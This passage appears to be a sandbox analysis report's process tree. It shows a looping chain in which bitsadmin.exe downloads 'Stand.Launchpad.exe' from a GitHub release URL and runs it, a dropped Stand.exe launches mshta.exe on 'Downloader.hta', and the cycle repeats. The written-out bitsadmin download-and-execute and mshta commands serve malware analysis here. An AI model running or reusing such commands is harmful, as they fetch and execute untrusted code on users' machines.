        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        11⤵
        Download via BitsAdmin
        
        PID:2512
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        11⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        12⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2592
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        12⤵
        
        PID:2880
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        13⤵
        Download via BitsAdmin
        
        PID:1976
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        13⤵
        
        PID:1120
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        14⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:860
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        14⤵
        Modifies Internet Explorer settings
        
        PID:2764
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        15⤵
        Download via BitsAdmin
        
        PID:2312
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        15⤵
        
        PID:1068
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        16⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2384
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        16⤵
        
        PID:400
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        17⤵
        Download via BitsAdmin
        
        PID:3068
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        17⤵
        
        PID:1108
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        18⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:804
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        18⤵
        Modifies Internet Explorer settings
        
        PID:1820
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        19⤵
        
        PID:2836
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        19⤵
        
        PID:2216
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        20⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        20⤵
        
        PID:2320
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        21⤵
        Download via BitsAdmin
        
        PID:2188
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        21⤵
        
        PID:2516
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        22⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        22⤵
        Modifies Internet Explorer settings
        
        PID:2796
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        23⤵
        Download via BitsAdmin
        
        PID:1964
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        23⤵
        
        PID:2364
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        24⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:596
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        24⤵
        Modifies Internet Explorer settings
        
        PID:1824
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        25⤵
        
        PID:2784
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        25⤵
        
        PID:2196
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        26⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2684
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        26⤵
        
        PID:2536
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        27⤵
        
        PID:2532
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        27⤵
        
        PID:1968
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        28⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        28⤵
        
        PID:2304
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        29⤵
        Download via BitsAdmin
        
        PID:1588
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        29⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        30⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2300
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        30⤵
        Modifies Internet Explorer settings
        
        PID:708
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        31⤵
        Download via BitsAdmin
        
        PID:2200
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        31⤵
        
        PID:1584
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        32⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        32⤵
        Modifies Internet Explorer settings
        
        PID:2728
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        33⤵
        
        PID:2220
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        33⤵
        
        PID:2120
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        34⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:696
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        34⤵
        Modifies Internet Explorer settings
        
        PID:2192
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        35⤵
        
        PID:2792
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        35⤵
        
        PID:2380
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        36⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2364
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        36⤵
        
        PID:2592
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        37⤵
        
        PID:2256
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        37⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        38⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        38⤵
        Modifies Internet Explorer settings
        
        PID:2132
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        39⤵
        
        PID:588
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        39⤵
        
        PID:1716
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        40⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2116
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        40⤵
        Modifies Internet Explorer settings
        
        PID:1940
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        41⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        41⤵
        
        PID:2700
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        42⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1616
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        42⤵
        Modifies Internet Explorer settings
        
        PID:2316
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        43⤵
        
        PID:2248
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        43⤵
        
        PID:2320
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        44⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2404
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        44⤵
        Modifies Internet Explorer settings
        
        PID:528
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        45⤵
        Download via BitsAdmin
        
        PID:1872
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        45⤵
        
        PID:864
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        46⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2780
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        46⤵
        Modifies Internet Explorer settings
        
        PID:1156
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        47⤵
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        47⤵
        
        PID:1500
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        48⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1504
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        48⤵
        Modifies Internet Explorer settings
        
        PID:320
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        49⤵
        
        PID:2984
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        49⤵
        
        PID:2604
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        50⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1620
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        50⤵
        Modifies Internet Explorer settings
        
        PID:1680
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        51⤵
        Download via BitsAdmin
        
        PID:2352
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        51⤵
        
        PID:968
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        52⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:3036
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        52⤵
        Modifies Internet Explorer settings
        
        PID:3008
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        53⤵
        
        PID:1820
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        53⤵
        
        PID:284
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        54⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1912
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        54⤵
        Modifies Internet Explorer settings
        
        PID:632
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        55⤵
        
        PID:1100
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        55⤵
        
        PID:544
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        56⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2384
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        56⤵
        Modifies Internet Explorer settings
        
        PID:2744
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        57⤵
        
        PID:1516
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        57⤵
        
        PID:2712
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        58⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:476
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        58⤵
        Modifies Internet Explorer settings
        
        PID:1048
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        59⤵
        
        PID:892
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        59⤵
        
        PID:2592
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        60⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2984
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        60⤵
        
        PID:2564
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        61⤵
        Download via BitsAdmin
        
        PID:332
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        61⤵
        
        PID:2528
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        62⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2964
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        62⤵
        
        PID:280
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        63⤵
        
        PID:1324
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        63⤵
        
        PID:1376
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        64⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2524
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        64⤵
        Modifies Internet Explorer settings
        
        PID:2684
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        65⤵
        Download via BitsAdmin
        
        PID:2492
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        65⤵
        
        PID:860
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        66⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1100
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        66⤵
        Modifies Internet Explorer settings
        
        PID:2052
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        67⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        67⤵
        
        PID:544
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        68⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1384
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        68⤵
        Modifies Internet Explorer settings
        
        PID:1120
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        69⤵
        
        PID:692
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        69⤵
        
        PID:1632
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        70⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2288
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        70⤵
        Modifies Internet Explorer settings
        
        PID:2940
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        71⤵
        
        PID:768
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        71⤵
        
        PID:2100
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        72⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1296
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        72⤵
        Modifies Internet Explorer settings
        
        PID:1916
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        73⤵
        
        PID:1540
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        73⤵
        
        PID:1348
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        74⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:1536
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        74⤵
        Modifies Internet Explorer settings
        
        PID:2736
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://github.com/calamity-inc/Stand-Launchpad/releases/download/1.9/Stand.Launchpad.exe C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        75⤵
        
        PID:2368
        
        C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe
        
        "C:\Users\Admin\AppData\Local\Temp\StandLaunchpad.exe"
        75⤵
        
        PID:1752
        
        C:\Users\Admin\AppData\Roaming\Stand.exe
        
        "C:\Users\Admin\AppData\Roaming\Stand.exe"
        76⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:2512
        
        C:\Windows\SysWOW64\mshta.exe
        
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\Downloader.hta"
        76⤵
        Modifies Internet Explorer settings
        
        PID:2492
        
        C:\Windows\SysWOW64\bitsadmin.exe
        
